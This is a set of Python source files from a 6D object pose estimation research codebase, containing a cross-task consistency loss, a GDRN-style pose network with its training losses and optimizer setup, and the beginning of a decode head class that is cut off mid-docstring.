"source": "4PiR2/SO-Pose",
"score": 2
} |
#### File: gdrn_selfocc_modeling/losses/crosstask_loss.py
```python
import sys
import os.path as osp
from functools import partial
import torch
import torch.nn as nn
import torch.nn.functional as F
from core.utils.pose_utils import quat2mat_torch
from .l2_loss import L2Loss
from fvcore.nn import smooth_l1_loss
from lib.utils.utils import dprint
from core.utils.pose_utils import get_closest_rot_batch
import logging
from detectron2.utils.logger import log_first_n
from lib.pysixd.misc import transform_pts_batch
logger = logging.getLogger(__name__)
class CT_loss(nn.Module):
def __init__(self,
loss_type="L2",
loss_weight=1.0
):
super().__init__()
self.loss_type = "L1"
self.loss_weight = 1.0
def forward(self, pred_rots, pred_P0, pred_Q0, gt_occmask, roi_extent, pred_transes=None):
"""
pred_rots: [B, 3, 3]
gt_rots: [B, 3, 3] or [B, 4]
gt_occmask: [B, 3, h, w]
pred_p0 : [B, c, h, w]
pred_transes: [B, 3]
gt_transes: [B, 3]
extents: [B, 3]
        roi_extent : [B, 3]  # used to map the normalized predictions back to the original object scale
stores K rotations regarding symmetries, if not symmetric, None
"""
b, c, h, w = pred_P0.shape
if pred_rots.shape[-1] == 4:
pred_rots = quat2mat_torch(pred_rots)
        # compute the cross-task consistency term
'''
(Rn)^Tt (RP0+t) = (Rn)^T(RP0+t) (RQ0+t)
'''
        # P0 and Q0 were normalized earlier, so they must first be mapped back to their original scale
denormalize_P0 = (pred_P0-0.5) * (roi_extent.repeat(h, w, 1, 1).permute(2, 3, 0, 1))
roi_p0_x = denormalize_P0[:, 0, :, :] # B, h, w
roi_p0_y = denormalize_P0[:, 1, :, :]
roi_p0_z = denormalize_P0[:, 2, :, :]
roi_p0 = torch.stack([roi_p0_x, roi_p0_y, roi_p0_z], dim=1) # B, 3, h, w
        # process Q0
roi_extent_q0 = torch.stack([roi_extent[:, 1],
roi_extent[:, 2],
roi_extent[:, 0],
roi_extent[:, 2],
roi_extent[:, 0],
roi_extent[:, 1]], dim=1)
denormalize_Q0 = (pred_Q0-0.5) * (roi_extent_q0.repeat(h, w, 1, 1).permute(2, 3, 0, 1))
roi_q0_xy_x = denormalize_Q0[:, 0, :, :]
roi_q0_xy_y = denormalize_Q0[:, 1, :, :]
roi_q0_xz_x = denormalize_Q0[:, 2, :, :]
roi_q0_xz_z = denormalize_Q0[:, 3, :, :]
roi_q0_yz_y = denormalize_Q0[:, 4, :, :]
roi_q0_yz_z = denormalize_Q0[:, 5, :, :]
roi_q0_x = torch.stack([torch.zeros([b, h, w], dtype=torch.float).cuda(), roi_q0_xy_x, roi_q0_xy_y],
dim=1) # n=(1,0,0) # [b, 3, h, w]
roi_q0_y = torch.stack([roi_q0_xz_x, torch.zeros([b, h, w], dtype=torch.float).cuda(), roi_q0_xz_z], dim=1)
roi_q0_z = torch.stack([roi_q0_yz_y, roi_q0_yz_z, torch.zeros([b, h, w], dtype=torch.float).cuda()], dim=1)
# the following four lines are only used for test
'''
roi_p0 = pred_P0
roi_q0_x = pred_Q0[:, 0:2, :, :]
roi_q0_y = pred_Q0[:, 2:4, :, :]
roi_q0_z = pred_Q0[:, 4:, :, :]
'''
        # now start the actual computation
RTt = (torch.bmm(pred_rots.permute(0, 2, 1), pred_transes.view(b, 3, 1))).squeeze() # b, 3
        # broadcast RTt to every point, shape becomes b, 3, n
        RTtn = RTt.repeat(h * w, 1, 1).permute(1, 2, 0)  # here n is the total number of points (h*w)
t_trans = pred_transes.view(b, 3).repeat(h * w, 1, 1).permute(1, 2, 0)
RP0t = torch.bmm(pred_rots, roi_p0.view(b, 3, -1)) + t_trans # b, 3, n, Rp0+t
# RP0t_norm = torch.norm(RP0t, p=2, dim=1, keepdim=False) # b, n
RQ0t1 = torch.bmm(pred_rots, roi_q0_x.view(b, 3, -1)) + t_trans # b, 3, n
# RQ0t1_norm = torch.norm(RQ0t1, p=2, dim=2, keepdim=False) # b, n
RQ0t2 = torch.bmm(pred_rots, roi_q0_y.view(b, 3, -1)) + t_trans # b, 3, n
# RQ0t2_norm = torch.norm(RQ0t2, p=2, dim=2, keepdim=False)
RQ0t3 = torch.bmm(pred_rots, roi_q0_z.view(b, 3, -1)) + t_trans # b, 3, n
# RQ0t3_norm = torch.norm(RQ0t3, p=2, dim=2, keepdim=False)
        # start computing the loss
        # loss for the plane normal n = (1, 0, 0)
        loss_x = RTtn[:, 0:1, :].repeat(1, 3, 1) * RP0t - \
                 (torch.bmm(pred_rots[:, :, 0:1].permute(0, 2, 1), RP0t)).repeat(1, 3, 1) * RQ0t1  # result: b, 3, n
        loss_x = torch.norm(loss_x, dim=1)  # b, n
        # elementwise products over shape (b, n), with n = h*w
        # use the occlusion mask to select the points that contribute, b,h,w --> b,n
        occmask_x = gt_occmask[:, 0, :, :].view(b, -1)
        loss_x = loss_x * occmask_x  # b,n
        if occmask_x.sum() < b * 3:  # too few visible points in the whole batch
            loss_x = 0
        else:
            loss_x = loss_x.sum()  # summed here; normalized by the occlusion mask count at the end
        # loss for the plane normal n = (0, 1, 0)
        loss_y = RTtn[:, 1:2, :].repeat(1, 3, 1) * RP0t - \
                 (torch.bmm(pred_rots[:, :, 1:2].permute(0, 2, 1), RP0t)).repeat(1, 3, 1) * RQ0t2  # result: b, 3, n
        loss_y = torch.norm(loss_y, dim=1)
        # elementwise products over shape (b, n), with n = h*w
        # use the occlusion mask to select the points that contribute, b,h,w --> b,n
        occmask_y = gt_occmask[:, 1, :, :].view(b, -1)
        loss_y = loss_y * occmask_y  # b,n
        if occmask_y.sum() < b * 3:  # too few visible points in the whole batch
            loss_y = 0
        else:
            loss_y = loss_y.sum()  # summed here; normalized by the occlusion mask count at the end
        # loss for the plane normal n = (0, 0, 1)
        loss_z = RTtn[:, 2:, :].repeat(1, 3, 1) * RP0t - \
                 (torch.bmm(pred_rots[:, :, 2:].permute(0, 2, 1), RP0t)).repeat(1, 3, 1) * RQ0t3  # result: b, 3, n
        loss_z = torch.norm(loss_z, dim=1)
        # elementwise products over shape (b, n), with n = h*w
        # use the occlusion mask to select the points that contribute, b,h,w --> b,n
        occmask_z = gt_occmask[:, 2, :, :].view(b, -1)
        loss_z = loss_z * occmask_z  # b,n
        if occmask_z.sum() < b * 3:  # too few visible points in the whole batch
            loss_z = 0
        else:
            loss_z = loss_z.sum()  # summed here; normalized by the occlusion mask count at the end
        # final loss, normalized by the number of occluded points
loss = (loss_x + loss_y + loss_z)/gt_occmask.sum().float().clamp(min=1.0)
return loss
```
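A shape-only sketch (not from the repository) showing the tensor layout `CT_loss` expects; everything below is random data, the import path is assumed, and a GPU is required because the loss allocates its helper tensors with `.cuda()`.
```python
import torch
from core.gdrn_selfocc_modeling.losses.crosstask_loss import CT_loss  # assumed import path

B, h, w = 2, 64, 64
pred_rots = torch.eye(3).repeat(B, 1, 1).cuda()            # [B, 3, 3] rotation matrices
pred_transes = torch.tensor([[0.0, 0.0, 1.0]] * B).cuda()  # [B, 3] translations
pred_P0 = torch.rand(B, 3, h, w).cuda()                    # normalized coordinate predictions
pred_Q0 = torch.rand(B, 6, h, w).cuda()                    # (xy_x, xy_y, xz_x, xz_z, yz_y, yz_z) channels
gt_occmask = (torch.rand(B, 3, h, w) > 0.5).float().cuda() # one occlusion mask per plane
roi_extent = torch.ones(B, 3).cuda()                       # object extents used to denormalize P0/Q0

loss = CT_loss()(pred_rots, pred_P0, pred_Q0, gt_occmask, roi_extent, pred_transes=pred_transes)
print(loss.item())  # scalar cross-task consistency loss
```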
#### File: gdrn_selfocc_modeling/models/GDRN_no_region.py
```python
import copy
import logging
import time
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from core.utils.solver_utils import build_optimizer_with_params
from detectron2.utils.events import get_event_storage
from mmcv.runner import load_checkpoint
from ..losses.coor_cross_entropy import CrossEntropyHeatmapLoss
from ..losses.l2_loss import L2Loss
from ..losses.pm_loss import PyPMLoss
from ..losses.rot_loss import angular_distance, rot_l2_loss
from .model_utils import (
compute_mean_re_te,
get_neck,
get_geo_head,
get_mask_prob,
get_pnp_net_no_region,
get_rot_mat,
get_xyz_mask_out_dim,
)
from .pose_from_pred import pose_from_pred
from .pose_from_pred_centroid_z import pose_from_pred_centroid_z
from .pose_from_pred_centroid_z_abs import pose_from_pred_centroid_z_abs
from .net_factory import BACKBONES
logger = logging.getLogger(__name__)
class GDRN_NoRegion(nn.Module):
def __init__(self, cfg, backbone, geo_head_net, neck=None, pnp_net=None):
super().__init__()
assert cfg.MODEL.POSE_NET.NAME == "GDRN_no_region", cfg.MODEL.POSE_NET.NAME
self.backbone = backbone
self.neck = neck
self.geo_head_net = geo_head_net
self.pnp_net = pnp_net
self.cfg = cfg
self.xyz_out_dim, self.mask_out_dim = get_xyz_mask_out_dim(cfg)
# uncertainty multi-task loss weighting
# https://github.com/Hui-Li/multi-task-learning-example-PyTorch/blob/master/multi-task-learning-example-PyTorch.ipynb
# a = log(sigma^2)
# L*exp(-a) + a or L*exp(-a) + log(1+exp(a))
# self.log_vars = nn.Parameter(torch.tensor([0, 0], requires_grad=True, dtype=torch.float32).cuda())
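        # Worked illustration (added note, not original code): with a = log_var = 0.5 and a raw task loss L = 2.0,
        # the weighted term L*exp(-a) + log(1+exp(a)) ~ 2.0*0.607 + 0.974 ~ 2.19; a larger learned a
        # down-weights that task's loss while log(1+exp(a)) keeps a from growing without bound.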
# yapf: disable
if cfg.MODEL.POSE_NET.USE_MTL:
self.loss_names = [
"mask", "coor_x", "coor_y", "coor_z", "coor_x_bin", "coor_y_bin", "coor_z_bin",
"PM_R", "PM_xy", "PM_z", "PM_xy_noP", "PM_z_noP", "PM_T", "PM_T_noP",
"centroid", "z", "trans_xy", "trans_z", "trans_LPnP", "rot", "bind",
]
for loss_name in self.loss_names:
self.register_parameter(
f"log_var_{loss_name}", nn.Parameter(torch.tensor([0.0], requires_grad=True, dtype=torch.float32))
)
# yapf: enable
def forward(
self,
x,
gt_xyz=None,
gt_xyz_bin=None,
gt_mask_trunc=None,
gt_mask_visib=None,
gt_mask_obj=None,
gt_region=None,
gt_ego_rot=None,
gt_points=None,
sym_infos=None,
gt_trans=None,
gt_trans_ratio=None,
roi_classes=None,
roi_coord_2d=None,
roi_cams=None,
roi_centers=None,
roi_whs=None,
roi_extents=None,
resize_ratios=None,
do_loss=False,
):
cfg = self.cfg
net_cfg = cfg.MODEL.POSE_NET
g_head_cfg = net_cfg.GEO_HEAD
pnp_net_cfg = net_cfg.PNP_NET
device = x.device
bs = x.shape[0]
num_classes = net_cfg.NUM_CLASSES
out_res = net_cfg.OUTPUT_RES
# x.shape [bs, 3, 256, 256]
conv_feat = self.backbone(x) # [bs, c, 8, 8]
if self.neck is not None:
conv_feat = self.neck(conv_feat)
mask, coor_x, coor_y, coor_z = self.geo_head_net(conv_feat)
if g_head_cfg.XYZ_CLASS_AWARE:
assert roi_classes is not None
coor_x = coor_x.view(bs, num_classes, self.xyz_out_dim // 3, out_res, out_res)
coor_x = coor_x[torch.arange(bs).to(device), roi_classes]
coor_y = coor_y.view(bs, num_classes, self.xyz_out_dim // 3, out_res, out_res)
coor_y = coor_y[torch.arange(bs).to(device), roi_classes]
coor_z = coor_z.view(bs, num_classes, self.xyz_out_dim // 3, out_res, out_res)
coor_z = coor_z[torch.arange(bs).to(device), roi_classes]
if g_head_cfg.MASK_CLASS_AWARE:
assert roi_classes is not None
mask = mask.view(bs, num_classes, self.mask_out_dim, out_res, out_res)
mask = mask[torch.arange(bs).to(device), roi_classes]
# -----------------------------------------------
# get rot and trans from pnp_net
# NOTE: use softmax for bins (the last dim is bg)
if coor_x.shape[1] > 1 and coor_y.shape[1] > 1 and coor_z.shape[1] > 1:
coor_x_softmax = F.softmax(coor_x[:, :-1, :, :], dim=1)
coor_y_softmax = F.softmax(coor_y[:, :-1, :, :], dim=1)
coor_z_softmax = F.softmax(coor_z[:, :-1, :, :], dim=1)
coor_feat = torch.cat([coor_x_softmax, coor_y_softmax, coor_z_softmax], dim=1)
else:
coor_feat = torch.cat([coor_x, coor_y, coor_z], dim=1) # BCHW
if pnp_net_cfg.WITH_2D_COORD:
assert roi_coord_2d is not None
coor_feat = torch.cat([coor_feat, roi_coord_2d], dim=1)
mask_atten = None
if pnp_net_cfg.MASK_ATTENTION != "none":
mask_atten = get_mask_prob(mask, mask_loss_type=net_cfg.LOSS_CFG.MASK_LOSS_TYPE)
pred_rot_, pred_t_ = self.pnp_net(coor_feat, extents=roi_extents, attention=mask_atten)
# convert pred_rot to rot mat -------------------------
rot_type = pnp_net_cfg.ROT_TYPE
pred_rot_m = get_rot_mat(pred_rot_, rot_type)
# convert pred_rot_m and pred_t to ego pose -----------------------------
if pnp_net_cfg.TRANS_TYPE == "centroid_z":
pred_ego_rot, pred_trans = pose_from_pred_centroid_z(
pred_rot_m,
pred_centroids=pred_t_[:, :2],
pred_z_vals=pred_t_[:, 2:3], # must be [B, 1]
roi_cams=roi_cams,
roi_centers=roi_centers,
resize_ratios=resize_ratios,
roi_whs=roi_whs,
eps=1e-4,
is_allo="allo" in pnp_net_cfg.ROT_TYPE,
z_type=pnp_net_cfg.Z_TYPE,
# is_train=True
is_train=do_loss, # TODO: sometimes we need it to be differentiable during test
)
elif pnp_net_cfg.TRANS_TYPE == "centroid_z_abs":
# abs 2d obj center and abs z
pred_ego_rot, pred_trans = pose_from_pred_centroid_z_abs(
pred_rot_m,
pred_centroids=pred_t_[:, :2],
pred_z_vals=pred_t_[:, 2:3], # must be [B, 1]
roi_cams=roi_cams,
eps=1e-4,
is_allo="allo" in pnp_net_cfg.ROT_TYPE,
# is_train=True
is_train=do_loss, # TODO: sometimes we need it to be differentiable during test
)
elif pnp_net_cfg.TRANS_TYPE == "trans":
pred_ego_rot, pred_trans = pose_from_pred(
pred_rot_m, pred_t_, eps=1e-4, is_allo="allo" in pnp_net_cfg.ROT_TYPE, is_train=do_loss
)
else:
raise ValueError(f"Unknown trans type: {pnp_net_cfg.TRANS_TYPE}")
if not do_loss: # test
out_dict = {"rot": pred_ego_rot, "trans": pred_trans}
if cfg.TEST.USE_PNP:
# TODO: move the pnp/ransac inside forward
                out_dict.update({"mask": mask, "coor_x": coor_x, "coor_y": coor_y, "coor_z": coor_z})
else:
out_dict = {}
assert (
(gt_xyz is not None)
and (gt_trans is not None)
and (gt_trans_ratio is not None)
and (gt_region is not None)
)
mean_re, mean_te = compute_mean_re_te(pred_trans, pred_rot_m, gt_trans, gt_ego_rot)
vis_dict = {
"vis/error_R": mean_re,
"vis/error_t": mean_te * 100, # cm
"vis/error_tx": np.abs(pred_trans[0, 0].detach().item() - gt_trans[0, 0].detach().item()) * 100, # cm
"vis/error_ty": np.abs(pred_trans[0, 1].detach().item() - gt_trans[0, 1].detach().item()) * 100, # cm
"vis/error_tz": np.abs(pred_trans[0, 2].detach().item() - gt_trans[0, 2].detach().item()) * 100, # cm
"vis/tx_pred": pred_trans[0, 0].detach().item(),
"vis/ty_pred": pred_trans[0, 1].detach().item(),
"vis/tz_pred": pred_trans[0, 2].detach().item(),
"vis/tx_net": pred_t_[0, 0].detach().item(),
"vis/ty_net": pred_t_[0, 1].detach().item(),
"vis/tz_net": pred_t_[0, 2].detach().item(),
"vis/tx_gt": gt_trans[0, 0].detach().item(),
"vis/ty_gt": gt_trans[0, 1].detach().item(),
"vis/tz_gt": gt_trans[0, 2].detach().item(),
"vis/tx_rel_gt": gt_trans_ratio[0, 0].detach().item(),
"vis/ty_rel_gt": gt_trans_ratio[0, 1].detach().item(),
"vis/tz_rel_gt": gt_trans_ratio[0, 2].detach().item(),
}
loss_dict = self.gdrn_loss(
cfg=self.cfg,
out_mask=mask,
gt_mask_trunc=gt_mask_trunc,
gt_mask_visib=gt_mask_visib,
gt_mask_obj=gt_mask_obj,
out_x=coor_x,
out_y=coor_y,
out_z=coor_z,
gt_xyz=gt_xyz,
gt_xyz_bin=gt_xyz_bin,
out_trans=pred_trans,
gt_trans=gt_trans,
out_rot=pred_ego_rot,
gt_rot=gt_ego_rot,
out_centroid=pred_t_[:, :2], # TODO: get these from trans head
out_trans_z=pred_t_[:, 2],
gt_trans_ratio=gt_trans_ratio,
gt_points=gt_points,
sym_infos=sym_infos,
extents=roi_extents,
# roi_classes=roi_classes,
)
if net_cfg.USE_MTL:
for _name in self.loss_names:
if f"loss_{_name}" in loss_dict:
vis_dict[f"vis_lw/{_name}"] = torch.exp(-getattr(self, f"log_var_{_name}")).detach().item()
for _k, _v in vis_dict.items():
if "vis/" in _k or "vis_lw/" in _k:
if isinstance(_v, torch.Tensor):
_v = _v.item()
vis_dict[_k] = _v
storage = get_event_storage()
storage.put_scalars(**vis_dict)
return out_dict, loss_dict
return out_dict
def gdrn_loss(
self,
cfg,
out_mask,
gt_mask_trunc,
gt_mask_visib,
gt_mask_obj,
out_x,
out_y,
out_z,
gt_xyz,
gt_xyz_bin,
out_rot=None,
gt_rot=None,
out_trans=None,
gt_trans=None,
out_centroid=None,
out_trans_z=None,
gt_trans_ratio=None,
gt_points=None,
sym_infos=None,
extents=None,
):
net_cfg = cfg.MODEL.POSE_NET
g_head_cfg = net_cfg.GEO_HEAD
pnp_net_cfg = net_cfg.PNP_NET
loss_cfg = net_cfg.LOSS_CFG
loss_dict = {}
gt_masks = {"trunc": gt_mask_trunc, "visib": gt_mask_visib, "obj": gt_mask_obj}
# xyz loss ----------------------------------
if not g_head_cfg.FREEZE:
xyz_loss_type = loss_cfg.XYZ_LOSS_TYPE
gt_mask_xyz = gt_masks[loss_cfg.XYZ_LOSS_MASK_GT]
if xyz_loss_type == "L1":
loss_func = nn.L1Loss(reduction="sum")
loss_dict["loss_coor_x"] = loss_func(
out_x * gt_mask_xyz[:, None], gt_xyz[:, 0:1] * gt_mask_xyz[:, None]
) / gt_mask_xyz.sum().float().clamp(min=1.0)
loss_dict["loss_coor_y"] = loss_func(
out_y * gt_mask_xyz[:, None], gt_xyz[:, 1:2] * gt_mask_xyz[:, None]
) / gt_mask_xyz.sum().float().clamp(min=1.0)
loss_dict["loss_coor_z"] = loss_func(
out_z * gt_mask_xyz[:, None], gt_xyz[:, 2:3] * gt_mask_xyz[:, None]
) / gt_mask_xyz.sum().float().clamp(min=1.0)
elif xyz_loss_type == "CE_coor":
gt_xyz_bin = gt_xyz_bin.long()
loss_func = CrossEntropyHeatmapLoss(reduction="sum", weight=None) # g_head_cfg.XYZ_BIN+1
loss_dict["loss_coor_x"] = loss_func(
out_x * gt_mask_xyz[:, None], gt_xyz_bin[:, 0] * gt_mask_xyz.long()
) / gt_mask_xyz.sum().float().clamp(min=1.0)
loss_dict["loss_coor_y"] = loss_func(
out_y * gt_mask_xyz[:, None], gt_xyz_bin[:, 1] * gt_mask_xyz.long()
) / gt_mask_xyz.sum().float().clamp(min=1.0)
loss_dict["loss_coor_z"] = loss_func(
out_z * gt_mask_xyz[:, None], gt_xyz_bin[:, 2] * gt_mask_xyz.long()
) / gt_mask_xyz.sum().float().clamp(min=1.0)
else:
raise NotImplementedError(f"unknown xyz loss type: {xyz_loss_type}")
loss_dict["loss_coor_x"] *= loss_cfg.XYZ_LW
loss_dict["loss_coor_y"] *= loss_cfg.XYZ_LW
loss_dict["loss_coor_z"] *= loss_cfg.XYZ_LW
# mask loss ----------------------------------
if not g_head_cfg.FREEZE:
mask_loss_type = loss_cfg.MASK_LOSS_TYPE
gt_mask = gt_masks[loss_cfg.MASK_LOSS_GT]
if mask_loss_type == "L1":
loss_dict["loss_mask"] = nn.L1Loss(reduction="mean")(out_mask[:, 0, :, :], gt_mask)
elif mask_loss_type == "BCE":
loss_dict["loss_mask"] = nn.BCEWithLogitsLoss(reduction="mean")(out_mask[:, 0, :, :], gt_mask)
elif mask_loss_type == "CE":
loss_dict["loss_mask"] = nn.CrossEntropyLoss(reduction="mean")(out_mask, gt_mask.long())
else:
raise NotImplementedError(f"unknown mask loss type: {mask_loss_type}")
loss_dict["loss_mask"] *= loss_cfg.MASK_LW
# point matching loss ---------------
if loss_cfg.PM_LW > 0:
assert (gt_points is not None) and (gt_trans is not None) and (gt_rot is not None)
loss_func = PyPMLoss(
loss_type=loss_cfg.PM_LOSS_TYPE,
beta=loss_cfg.PM_SMOOTH_L1_BETA,
reduction="mean",
loss_weight=loss_cfg.PM_LW,
norm_by_extent=loss_cfg.PM_NORM_BY_EXTENT,
symmetric=loss_cfg.PM_LOSS_SYM,
disentangle_t=loss_cfg.PM_DISENTANGLE_T,
disentangle_z=loss_cfg.PM_DISENTANGLE_Z,
t_loss_use_points=loss_cfg.PM_T_USE_POINTS,
r_only=loss_cfg.PM_R_ONLY,
)
loss_pm_dict = loss_func(
pred_rots=out_rot,
gt_rots=gt_rot,
points=gt_points,
pred_transes=out_trans,
gt_transes=gt_trans,
extents=extents,
sym_infos=sym_infos,
)
loss_dict.update(loss_pm_dict)
# rot_loss ----------
if loss_cfg.ROT_LW > 0:
if loss_cfg.ROT_LOSS_TYPE == "angular":
loss_dict["loss_rot"] = angular_distance(out_rot, gt_rot)
elif loss_cfg.ROT_LOSS_TYPE == "L2":
loss_dict["loss_rot"] = rot_l2_loss(out_rot, gt_rot)
else:
raise ValueError(f"Unknown rot loss type: {loss_cfg.ROT_LOSS_TYPE}")
loss_dict["loss_rot"] *= loss_cfg.ROT_LW
# centroid loss -------------
if loss_cfg.CENTROID_LW > 0:
assert (
pnp_net_cfg.TRANS_TYPE == "centroid_z"
), "centroid loss is only valid for predicting centroid2d_rel_delta"
if loss_cfg.CENTROID_LOSS_TYPE == "L1":
loss_dict["loss_centroid"] = nn.L1Loss(reduction="mean")(out_centroid, gt_trans_ratio[:, :2])
elif loss_cfg.CENTROID_LOSS_TYPE == "L2":
loss_dict["loss_centroid"] = L2Loss(reduction="mean")(out_centroid, gt_trans_ratio[:, :2])
elif loss_cfg.CENTROID_LOSS_TYPE == "MSE":
loss_dict["loss_centroid"] = nn.MSELoss(reduction="mean")(out_centroid, gt_trans_ratio[:, :2])
else:
raise ValueError(f"Unknown centroid loss type: {loss_cfg.CENTROID_LOSS_TYPE}")
loss_dict["loss_centroid"] *= loss_cfg.CENTROID_LW
# z loss ------------------
if loss_cfg.Z_LW > 0:
z_type = pnp_net_cfg.Z_TYPE
if z_type == "REL":
gt_z = gt_trans_ratio[:, 2]
elif z_type == "ABS":
gt_z = gt_trans[:, 2]
else:
raise NotImplementedError
z_loss_type = loss_cfg.Z_LOSS_TYPE
if z_loss_type == "L1":
loss_dict["loss_z"] = nn.L1Loss(reduction="mean")(out_trans_z, gt_z)
elif z_loss_type == "L2":
loss_dict["loss_z"] = L2Loss(reduction="mean")(out_trans_z, gt_z)
elif z_loss_type == "MSE":
loss_dict["loss_z"] = nn.MSELoss(reduction="mean")(out_trans_z, gt_z)
else:
raise ValueError(f"Unknown z loss type: {z_loss_type}")
loss_dict["loss_z"] *= loss_cfg.Z_LW
# trans loss ------------------
if loss_cfg.TRANS_LW > 0:
if loss_cfg.TRANS_LOSS_DISENTANGLE:
# NOTE: disentangle xy/z
if loss_cfg.TRANS_LOSS_TYPE == "L1":
loss_dict["loss_trans_xy"] = nn.L1Loss(reduction="mean")(out_trans[:, :2], gt_trans[:, :2])
loss_dict["loss_trans_z"] = nn.L1Loss(reduction="mean")(out_trans[:, 2], gt_trans[:, 2])
elif loss_cfg.TRANS_LOSS_TYPE == "L2":
loss_dict["loss_trans_xy"] = L2Loss(reduction="mean")(out_trans[:, :2], gt_trans[:, :2])
loss_dict["loss_trans_z"] = L2Loss(reduction="mean")(out_trans[:, 2], gt_trans[:, 2])
elif loss_cfg.TRANS_LOSS_TYPE == "MSE":
loss_dict["loss_trans_xy"] = nn.MSELoss(reduction="mean")(out_trans[:, :2], gt_trans[:, :2])
loss_dict["loss_trans_z"] = nn.MSELoss(reduction="mean")(out_trans[:, 2], gt_trans[:, 2])
else:
raise ValueError(f"Unknown trans loss type: {loss_cfg.TRANS_LOSS_TYPE}")
loss_dict["loss_trans_xy"] *= loss_cfg.TRANS_LW
loss_dict["loss_trans_z"] *= loss_cfg.TRANS_LW
else:
if loss_cfg.TRANS_LOSS_TYPE == "L1":
loss_dict["loss_trans_LPnP"] = nn.L1Loss(reduction="mean")(out_trans, gt_trans)
elif loss_cfg.TRANS_LOSS_TYPE == "L2":
loss_dict["loss_trans_LPnP"] = L2Loss(reduction="mean")(out_trans, gt_trans)
elif loss_cfg.TRANS_LOSS_TYPE == "MSE":
loss_dict["loss_trans_LPnP"] = nn.MSELoss(reduction="mean")(out_trans, gt_trans)
else:
raise ValueError(f"Unknown trans loss type: {loss_cfg.TRANS_LOSS_TYPE}")
loss_dict["loss_trans_LPnP"] *= loss_cfg.TRANS_LW
# bind loss (R^T@t)
if loss_cfg.get("BIND_LW", 0.0) > 0.0:
pred_bind = torch.bmm(out_rot.permute(0, 2, 1), out_trans.view(-1, 3, 1)).view(-1, 3)
gt_bind = torch.bmm(gt_rot.permute(0, 2, 1), gt_trans.view(-1, 3, 1)).view(-1, 3)
if loss_cfg.BIND_LOSS_TYPE == "L1":
loss_dict["loss_bind"] = nn.L1Loss(reduction="mean")(pred_bind, gt_bind)
elif loss_cfg.BIND_LOSS_TYPE == "L2":
loss_dict["loss_bind"] = L2Loss(reduction="mean")(pred_bind, gt_bind)
elif loss_cfg.CENTROID_LOSS_TYPE == "MSE":
loss_dict["loss_bind"] = nn.MSELoss(reduction="mean")(pred_bind, gt_bind)
else:
raise ValueError(f"Unknown bind loss (R^T@t) type: {loss_cfg.BIND_LOSS_TYPE}")
loss_dict["loss_bind"] *= loss_cfg.BIND_LW
if net_cfg.USE_MTL:
for _k in loss_dict:
_name = _k.replace("loss_", "log_var_")
cur_log_var = getattr(self, _name)
loss_dict[_k] = loss_dict[_k] * torch.exp(-cur_log_var) + torch.log(1 + torch.exp(cur_log_var))
return loss_dict
def build_model_optimizer(cfg, is_test=False):
net_cfg = cfg.MODEL.POSE_NET
backbone_cfg = net_cfg.BACKBONE
params_lr_list = []
# backbone
backbone_type = backbone_cfg.INIT_CFG.pop("type")
init_backbone_args = copy.deepcopy(backbone_cfg.INIT_CFG)
if "timm/" in backbone_type or "tv/" in backbone_type:
init_backbone_args["model_name"] = backbone_type.split("/")[-1]
backbone = BACKBONES[backbone_type](**init_backbone_args)
if backbone_cfg.FREEZE:
for param in backbone.parameters():
with torch.no_grad():
param.requires_grad = False
else:
params_lr_list.append(
{
"params": filter(lambda p: p.requires_grad, backbone.parameters()),
"lr": float(cfg.SOLVER.BASE_LR),
}
)
# neck --------------------------------
neck, neck_params = get_neck(cfg)
params_lr_list.extend(neck_params)
# geo head -----------------------------------------------------
geo_head, geo_head_params = get_geo_head(cfg)
params_lr_list.extend(geo_head_params)
# pnp net -----------------------------------------------
pnp_net, pnp_net_params = get_pnp_net_no_region(cfg)
params_lr_list.extend(pnp_net_params)
# build model
model = GDRN_NoRegion(cfg, backbone, neck=neck, geo_head_net=geo_head, pnp_net=pnp_net)
if net_cfg.USE_MTL:
params_lr_list.append(
{
"params": filter(
lambda p: p.requires_grad,
[_param for _name, _param in model.named_parameters() if "log_var" in _name],
),
"lr": float(cfg.SOLVER.BASE_LR),
}
)
# get optimizer
if is_test:
optimizer = None
else:
optimizer = build_optimizer_with_params(cfg, params_lr_list)
if cfg.MODEL.WEIGHTS == "":
## backbone initialization
backbone_pretrained = backbone_cfg.get("PRETRAINED", "")
if backbone_pretrained == "":
logger.warning("Randomly initialize weights for backbone!")
elif backbone_pretrained in ["timm", "internal"]:
# skip if it has already been initialized by pretrained=True
logger.info("Check if the backbone has been initialized with its own method!")
else:
# initialize backbone with official weights
tic = time.time()
logger.info(f"load backbone weights from: {backbone_pretrained}")
load_checkpoint(model.backbone, backbone_pretrained, strict=False, logger=logger)
logger.info(f"load backbone weights took: {time.time() - tic}s")
model.to(torch.device(cfg.MODEL.DEVICE))
return model, optimizer
```
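When `USE_MTL` is enabled, the loop at the end of the loss function weights each task loss by a learned log-variance fetched via `getattr(self, "log_var_...")`, in the spirit of the usual homoscedastic-uncertainty multi-task recipe. Below is a minimal, self-contained sketch of that weighting; the tensor names and values are illustrative only and not taken from the real config.

```python
import torch

# One learnable log-variance per task (registered on the model in the real code).
log_vars = {
    "loss_rot": torch.zeros(1, requires_grad=True),
    "loss_trans_xy": torch.zeros(1, requires_grad=True),
}
raw_losses = {"loss_rot": torch.tensor(0.8), "loss_trans_xy": torch.tensor(0.3)}

# loss * exp(-log_var) + log(1 + exp(log_var)): uncertain tasks get down-weighted,
# while the second term stops the log-variances from growing without bound.
weighted = {
    k: v * torch.exp(-log_vars[k]) + torch.log(1 + torch.exp(log_vars[k]))
    for k, v in raw_losses.items()
}
total = sum(weighted.values())
total.backward()  # gradients reach both the task losses and the log-variances
```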
#### File: models/heads/fpn_mask_xyz_region_head.py
```python
from abc import ABCMeta
import numpy as np
import torch
import torch.nn as nn
from torch.nn.modules.batchnorm import _BatchNorm
from mmcv.cnn import normal_init, constant_init
from core.gdrn_selfocc_modeling.tools.layers.layer_utils import resize
from core.gdrn_selfocc_modeling.tools.layers.conv_module import ConvModule
class BaseDecodeHead(nn.Module, metaclass=ABCMeta):
"""Base class for BaseDecodeHead.
Args:
in_channels (int|Sequence[int]): Input channels.
channels (int): Channels after modules, before conv_seg.
num_classes (int): Number of classes.
dropout_ratio (float): Ratio of dropout layer. Default: 0.1.
conv_cfg (dict|None): Config of conv layers. Default: None.
in_index (int|Sequence[int]): Input feature index. Default: -1
input_transform (str|None): Transformation type of input features.
Options: 'resize_concat', 'multiple_select', None.
'resize_concat': Multiple feature maps will be resized to the
same size as the first one and then concatenated together.
Usually used in FCN head of HRNet.
'multiple_select': Multiple feature maps will be bundled into
a list and passed into the decode head.
None: Only one select feature map is allowed.
Default: None.
ignore_index (int | None): The label index to be ignored. When using
